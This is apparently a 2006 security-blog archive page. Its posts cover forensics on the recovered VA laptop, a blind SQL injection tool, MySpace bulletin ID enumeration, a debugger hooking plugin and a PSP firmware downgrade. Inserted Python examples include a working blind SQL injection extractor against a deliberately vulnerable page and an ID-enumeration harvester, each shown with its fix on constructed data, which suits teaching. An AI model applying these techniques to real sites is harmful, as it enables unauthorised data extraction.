Archive | July, 2006

A Forensic Analysis of the Lost Veteran’s Administration Laptop

An interesting speculative post on the forensics techniques that would most likely be used by the FBI during the investigation of the recovered Veteran’s Administration laptop.

Most of them are pretty straightforward if you have any experience with digital forensics and data recovery (disaster recovery, incident response, etc.).

As a former Computer Forensic Specialist, I wanted to explain what’s probably going on with this laptop now that the FBI has the system and is forensically examining it. This explanation assumes the data was present on the hard drive (not a CD-ROM or other storage medium).

The two main areas are physical examination and digital examination: the physical side covers fingerprints and evidence of tampering (screw heads, case scratches, etc.); the digital side covers what the file system itself records.

There is also a little discussion of MAC times (modification, access and change timestamps) and so on; if anyone is interested in this area, I might elaborate later.

As I said in the previous article, there isn’t much they can do if whoever had the drive knew what they were doing.

The laptop thieves really know what they are doing. They remove the hard drive from the laptop, and mount it read-only (no modifications to the file system) on another computer, access the sensitive data and re-insert the hard drive into the stolen laptop. This is the same process the forensic examiner would use to prevent the examination from modifying the data contained on the laptop — and this is why I mentioned what the FBI might look for during the physical examination — marks on the screws or fingerprints on the internal hard drive casing.

Indeed.

Source: Zonelabs
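The digital side of the examination in runnable form, covering both the read-only mount and MAC-time points quoted above and the "how hard is it to mount the drive read only and clone it?" question in the recovery post further down this page. This is an added example, not code from the Zonelabs post or from Darknet: a temporary directory stamped with os.utime stands in for a mounted image, and every file name, timestamp and content in it is constructed.

```python
import hashlib
import os
import tempfile

# Constructed timestamps (seconds since the epoch) for the sample tree.
T0 = 1152000000          # the files' last modification time
READ_LATER = T0 + 86400  # one day later: when "veterans.db" was read


def sha256_file(path):
    """Hash one file in chunks."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def hash_tree(root):
    """Hash every file under root. An examiner records this for the image
    before and after analysis to prove the examination changed nothing; it
    is also what a careful thief's read-only clone would reproduce exactly."""
    hashes = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            hashes[os.path.relpath(path, root)] = sha256_file(path)
    return hashes


def mac_timeline(root):
    """Build a mactime-style timeline: one (timestamp, kind, path) entry for
    the M, A and C time of every file under root, oldest first."""
    events = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            rel = os.path.relpath(path, root)
            events.append((int(st.st_mtime), "m", rel))
            events.append((int(st.st_atime), "a", rel))
            events.append((int(st.st_ctime), "c", rel))
    events.sort()
    return events


def accessed_after_modified(root):
    """Files whose last access is later than their last modification. A drive
    that was only ever mounted read-only (mount -o ro,noatime) cannot acquire
    such a gap after the theft; one browsed through a normal read-write mount
    shows it on exactly the files that were opened."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = os.path.join(dirpath, name)
            st = os.stat(path)
            if int(st.st_atime) > int(st.st_mtime):
                hits.append(os.path.relpath(path, root))
    return sorted(hits)


def build_sample():
    """Constructed evidence: two files stamped with os.utime. utime can set
    atime and mtime but never ctime, which becomes 'now'; that fresh ctime is
    how an examiner spots timestomping of the other two fields."""
    root = tempfile.mkdtemp(prefix="image_")
    for name, atime in (("readme.txt", T0), ("veterans.db", READ_LATER)):
        path = os.path.join(root, name)
        with open(path, "wb") as f:
            f.write(b"sample data for " + name.encode())
        os.utime(path, (atime, T0))
    return root


if __name__ == "__main__":
    root = build_sample()
    for ts, kind, rel in mac_timeline(root):
        print(ts, kind, rel)
    print("accessed after last write:", accessed_after_modified(root))
    print("image hashes:", hash_tree(root))
```

The caveat that the quoted post makes is visible in the output: a thief who mounts the drive read-only leaves the access times alone, so an absence of atime gaps proves nothing, and the hashes before and after their clone match; only the physical traces (screw marks, fingerprints on the drive casing) would remain.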


Posted in: Countermeasures, Forensics, General News


Darknet – Subscribe by E-mail

If you aren’t using RSS, you can now subscribe to Darknet via e-mail; you will receive a daily update of the posts published in the last 24 hours.

Powered by FeedBlitz

Might be useful if you don’t have frequent access to check the site too.

Cheers!


Posted in: Site News



Veterans Administration Chief Says Laptop Recovered

Ah, so finally they got it back, from a street corner of all places.

Let’s hope they will be a little more careful in the future, yeah?

The missing laptop and hard drive that contained veterans’ personal information has been found, Veterans Administration Chief Jim Nicholson announced Thursday.

The announcement came at the beginning of a hearing before the House Veterans’ Affairs Committee.

“It was confirmed to me by the deputy attorney general that law enforcement has in their possession the … laptop and hard drive,” Nicholson said in a statement at the hearing. “The serial numbers match.”

Of course the FBI will roll out its forensics experts to testify that the data has not been accessed, but let’s face it, how hard is it to mount the drive read-only and clone it?

Not very, right?

Experts were conducting forensic tests on the laptop and hard drive, Nicholson said. It was not immediately clear if the data on the equipment had been copied or compromised, but Nicholson said “there is reason to be optimistic.”

He did not say how the equipment was recovered, or where it’s been during the past two months. The equipment was found Wednesday; Nicholson said he wasn’t aware of any arrests made in connection with the incident.

An FBI spokesman said the laptop computer was recovered “in the area,” but could not provide more specific information. Forensics tests showed “the sensitive files were not accessed,” according to special agent in charge Bill Chase.

We’ll look at the forensics techniques in more depth later.

Source: MSNBC


Posted in: General News, Hardware Hacking



Month of Browser Bugs (MoBB)

Get ready for a complete month of fun with H D Moore’s Month of Browser Bugs.

Quoting from the Browser Fun blog:

This blog will serve as a dumping ground for browser-based security research and vulnerability disclosure. To kick off this blog, we are announcing the Month of Browser Bugs (MoBB), where we will publish a new browser hack, every day, for the entire month of July. The hacks we publish are carefully chosen to demonstrate a concept without disclosing a direct path to remote code execution. Enjoy!

He says he has plenty of vulnerabilities to go around.

You can also read his post at Metasploit’s blog.


Posted in: Exploits/Vulnerabilities



Absinthe Blind SQL Injection Tool/Software

Absinthe is a GUI-based tool that automates the process of downloading the schema and contents of a database that is vulnerable to blind SQL injection.

Absinthe does not aid in the discovery of SQL injection holes; it only speeds up the retrieval of data once a hole has been found.

Features:


  • Automated SQL Injection
  • Supports MS SQL Server, MSDE, Oracle, Postgres
  • Cookies / Additional HTTP Headers
  • Query Termination
  • Additional text appended to queries
  • Supports Use of Proxies / Proxy Rotation
  • Multiple filters for page profiling
  • Custom Delimiters

More Information here:

Absinthe (Documentation)
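What "blind" means here, and why a tool like Absinthe is needed to pull data out through it, as an added example that is not Absinthe's own code. An in-memory SQLite database stands in for the target's backend (Absinthe itself targets MS SQL Server, MSDE, Oracle and Postgres), the users table and its rows are constructed, vulnerable_page() is the deliberately injectable endpoint and safe_page() the parameterised fix; BlindExtractor is my name for the boolean-based extraction loop.

```python
import sqlite3


def make_db():
    """Constructed target database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, pw TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "s3cret"), (2, "bob", "hunter2")])
    return conn


def vulnerable_page(conn, user_id):
    """Deliberately vulnerable: the id parameter is concatenated into SQL.
    The page never echoes database content, only found/not found, so a UNION
    injection shows nothing; the true/false difference is all an attacker gets."""
    row = conn.execute(f"SELECT name FROM users WHERE id = {user_id}").fetchone()
    return "User found" if row else "No such user"


def safe_page(conn, user_id):
    """The fix: a bound parameter is data, never SQL."""
    row = conn.execute("SELECT name FROM users WHERE id = ?", (user_id,)).fetchone()
    return "User found" if row else "No such user"


class BlindExtractor:
    """Boolean-based blind extraction: ask the page yes/no questions about a
    sub-select and binary-search each character, which is what a tool like
    Absinthe automates across many requests."""

    def __init__(self, page, conn):
        self.page, self.conn, self.requests = page, conn, 0

    def ask(self, condition):
        # One "HTTP request": id=1 AND (<condition>) keeps or drops the row.
        self.requests += 1
        return self.page(self.conn, f"1 AND ({condition})") == "User found"

    def _search(self, lo, hi, greater_than):
        # Smallest v in [lo, hi] for which "value > v" is false, i.e. the value.
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(mid):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, subquery, max_len=64):
        length = self._search(0, max_len,
                              lambda n: self.ask(f"length(({subquery})) > {n}"))
        out = ""
        for pos in range(1, length + 1):
            code = self._search(32, 126, lambda c: self.ask(
                f"unicode(substr(({subquery}), {pos}, 1)) > {c}"))
            out += chr(code)
        return out


def demo():
    """Pull the admin password out of the page one bit of truth at a time."""
    conn = make_db()
    x = BlindExtractor(vulnerable_page, conn)
    pw = x.extract("SELECT pw FROM users WHERE name = 'admin'")
    return pw, x.requests


if __name__ == "__main__":
    pw, n = demo()
    print(f"extracted {pw!r} in {n} requests")
```

The binary search is the whole point of such tools: each printable character costs about seven requests instead of up to 95, and the same loop retrieves table names from the catalogue views just as easily as a password. Against safe_page() the injected id is passed as a literal string, matches no integer id, and the oracle is silent.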


Posted in: Database Hacking, Hacking Tools, Web Hacking



Data Mining MySpace Bulletins

An interesting find by John Hackenger surfaced today. For those of you familiar with MySpace, you’ll know that it uses ‘Bulletins’ to send a single message to multiple friends on your list.

Because the message is sent only to the people you have authorized to be on your list, you sometimes get a feeling of safety that makes you post information you would otherwise not want available on the Internet.

What if this information wasn’t private and could be available to everyone?

Because the bulletin IDs in the URL are numeric and sequential, anyone can walk through them and read bulletins they were never sent.

John Hackenger explains his finding in a complete post.

As you can see, he coded a little application in C to make the whole process simpler; it needs some work on the syntax errors.
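The enumeration and the two fixes a site owner would want, as an added example that is neither Hackenger’s C program nor anything from MySpace: FRIENDS and BULLETINS are constructed data, SequentialStore models the weak scheme (numeric id in the URL, no check on who is asking), AuthorizedStore the corrected one, and harvest() is the attacker’s loop.

```python
import secrets

# Constructed data: who is friends with whom, and five bulletins posted by
# two users to their friend lists.
FRIENDS = {"alice": {"bob", "carol"}, "dave": {"erin"}}
BULLETINS = [
    ("alice", "party at my place Friday, address is 12 Elm St"),
    ("dave", "lost my job, don't tell anyone"),
    ("alice", "new phone number 555-0100"),
    ("dave", "away 1st to 14th, house empty"),
    ("alice", "feeling down lately"),
]


class SequentialStore:
    """Models the weakness: bulletin N lives at /bulletin?id=N and the server
    never asks who is requesting it."""

    def __init__(self, bulletins):
        self.rows = {i + 1: b for i, b in enumerate(bulletins)}

    def url(self, bulletin_id):
        return f"/bulletin?id={bulletin_id}"

    def fetch(self, bulletin_id, viewer):
        return self.rows.get(bulletin_id)   # viewer is ignored


class AuthorizedStore:
    """Two independent fixes: the server checks that the viewer is the author
    or on the author's friend list (the one that actually matters), and ids
    are random so there is no sequence to walk in the first place."""

    def __init__(self, bulletins, friends):
        self.friends = friends
        self.rows = {}
        for author, text in bulletins:
            bid = secrets.token_urlsafe(16)   # 128 random bits, unguessable
            self.rows[bid] = (author, text)

    def ids_for(self, author):
        return [bid for bid, (a, _) in self.rows.items() if a == author]

    def fetch(self, bulletin_id, viewer):
        row = self.rows.get(bulletin_id)
        if row is None:
            return None
        author, text = row
        if viewer != author and viewer not in self.friends.get(author, ()):
            return None     # unauthorised: same answer as "does not exist"
        return (author, text)


def harvest(store, guesses, viewer="stranger"):
    """What the enumeration loop does: try every id and keep the hits."""
    hits = []
    for guess in guesses:
        row = store.fetch(guess, viewer)
        if row is not None:
            hits.append(row)
    return hits


if __name__ == "__main__":
    weak = SequentialStore(BULLETINS)
    print("sequential ids, no auth:", len(harvest(weak, range(1, 1000))), "bulletins leaked")
    fixed = AuthorizedStore(BULLETINS, FRIENDS)
    print("random ids + auth check:", len(harvest(fixed, range(1, 1000))), "bulletins leaked")
    print("bob reading alice's list:", len(harvest(fixed, fixed.ids_for("alice"), "bob")))
```

The authorization check is the fix that matters; random ids only raise the cost of guessing. Returning the same response for "no such bulletin" and "not yours" also keeps the id space from being mapped by an unauthenticated client.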


Posted in: Privacy, Web Hacking



Universal Hooker – An Ollydbg Plugin

The Universal Hooker is a tool to intercept the execution of programs. It enables the user to intercept calls to API functions inside DLLs, and also calls to arbitrary addresses within the executable file in memory.

Why is it ‘Universal’? There are different ways of hooking functions in a program: it can be done by setting software breakpoints (int 3), hardware breakpoints (the CPU debug registers), or by overwriting the prologue of a function to jump to a ‘stub’, etc. All the methods mentioned above, especially the latter, usually require the programmer writing the hook to have certain knowledge of the function being intercepted. If the hook is written in a language like C/C++, the code will normally need to be recompiled for every function one wants to intercept.

The Universal Hooker tries to create very simple abstractions that allow a user of the tool to write hooks for different API and non-API functions in an interpreted language (Python), without the need to compile anything, and with the possibility of changing the code that gets executed when the hooked function is called at runtime.

The Universal Hooker builds on the idea that the handler for a hook is the one with the knowledge of the parameter types of the function it handles. The Universal Hooker itself only knows the number of parameters of the function, and obtains them from the stack (all as DWORDs). The hook handler is the one that interprets those DWORDs as the types the function actually receives.

The hook handlers are written in Python, which eliminates the need to recompile them when a modification is required. The hook handlers (executed by the server) are also reloaded from disk every time a hook fires, which means one can change the behaviour of a handler without recompiling anything or restarting the application being analyzed.

What can you do with it?

  • Fuzz at runtime without implementing the protocol: just modify the packets
  • Interactive fuzzing using a hex editor
  • Poor man’s HTTP/HTTPS proxy
  • Many other things; check out the documentation

You can download it here:

Universal Hooker (Documentation)
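The design described in the last three paragraphs (untyped DWORDs popped from the stack, a handler that supplies the types, handlers re-read from disk on every call) modelled in plain Python, as an added example that is not the Universal Hooker’s own code or API. The 256-byte ‘memory’, the stack image and the send() argument layout are constructed, HANDLER_V1 and HANDLER_V2 are hypothetical hook handlers, and dispatch() and load_handler() are names chosen for this example.

```python
import os
import struct
import tempfile

# The target is x86: each argument is a 32-bit little-endian DWORD pushed on
# the stack, so at function entry the stack reads [return address][arg1][arg2]...
HANDLER_V1 = '''
def handle(args, memory):
    # send(SOCKET s, const char *buf, int len, int flags): only this handler
    # knows that arg 1 is a pointer and arg 2 the length it points at.
    s, buf, length, flags = args
    return bytes(memory[buf:buf + length])
'''

HANDLER_V2 = '''
def handle(args, memory):
    # The same hook after being edited on disk while the target keeps running:
    # it now flips the first byte of the outgoing packet in place, i.e. runtime
    # fuzzing with no protocol implementation.
    s, buf, length, flags = args
    memory[buf] ^= 0xFF
    return bytes(memory[buf:buf + length])
'''


def load_handler(path):
    """Re-read and re-execute the handler source on every call; that is what
    lets the hook change without restarting the debuggee."""
    namespace = {}
    with open(path) as f:
        exec(compile(f.read(), path, "exec"), namespace)
    return namespace["handle"]


def dispatch(stack, nparams, handler_path, memory):
    """The universal part: skip the return address, pop nparams DWORDs and
    hand them, untyped, to whatever handler is currently on disk."""
    args = struct.unpack("<%dI" % nparams, stack[4:4 + 4 * nparams])
    return load_handler(handler_path)(args, memory)


def build_target():
    """Constructed process state: a 256-byte memory with a packet at 0x40 and
    a stack image for the call send(7, 0x40, 16, 0)."""
    memory = bytearray(256)
    packet = b"GET / HTTP/1.0\r\n"
    memory[0x40:0x40 + len(packet)] = packet
    stack = struct.pack("<5I", 0xDEADBEEF, 7, 0x40, len(packet), 0)
    return memory, stack


def run_demo():
    """Hook send() once, edit the handler file, hook it again."""
    memory, stack = build_target()
    path = os.path.join(tempfile.mkdtemp(), "send_hook.py")
    with open(path, "w") as f:
        f.write(HANDLER_V1)
    first = dispatch(stack, 4, path, memory)
    with open(path, "w") as f:          # edit the hook; the target is still "running"
        f.write(HANDLER_V2)
    second = dispatch(stack, 4, path, memory)
    return first, second


if __name__ == "__main__":
    first, second = run_demo()
    print("original packet:", first)
    print("after editing the handler:", second)
```

The cost of this design is also visible: the hook core cannot validate the arguments it hands over, so a handler that misreads a DWORD as a pointer will read the wrong memory, and a handler file that is writable by others is arbitrary code executed inside the debugger on every call.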


Posted in: Hacking Tools



Downgrade PSP v2.6 to v1.5 to play homebrew & ISO games

Dark_AleX has now shared Downgrader Test v0.5 for PSP 2.50/2.60 firmware which, according to many users (including TGMG, LalaMan, Firey, and LAXitives), works 100% with PSP consoles that were upgraded to v2.50 or v2.60 firmware. However, it will NOT work with TA-082 motherboards and is NOT recommended for users whose factory/stock firmware was 2.50 or 2.60.

Check out the video of it in action here. Unfortunately the video quality is crap, but it’s proof that it works. This hack was only released yesterday. So for those who have upgraded their PSP to v2.6, you can still downgrade to v1.5 to be able to play homebrew games and also ISO games.

Use this to check if you have TA-082 before you continue.


Posted in: General Hacking
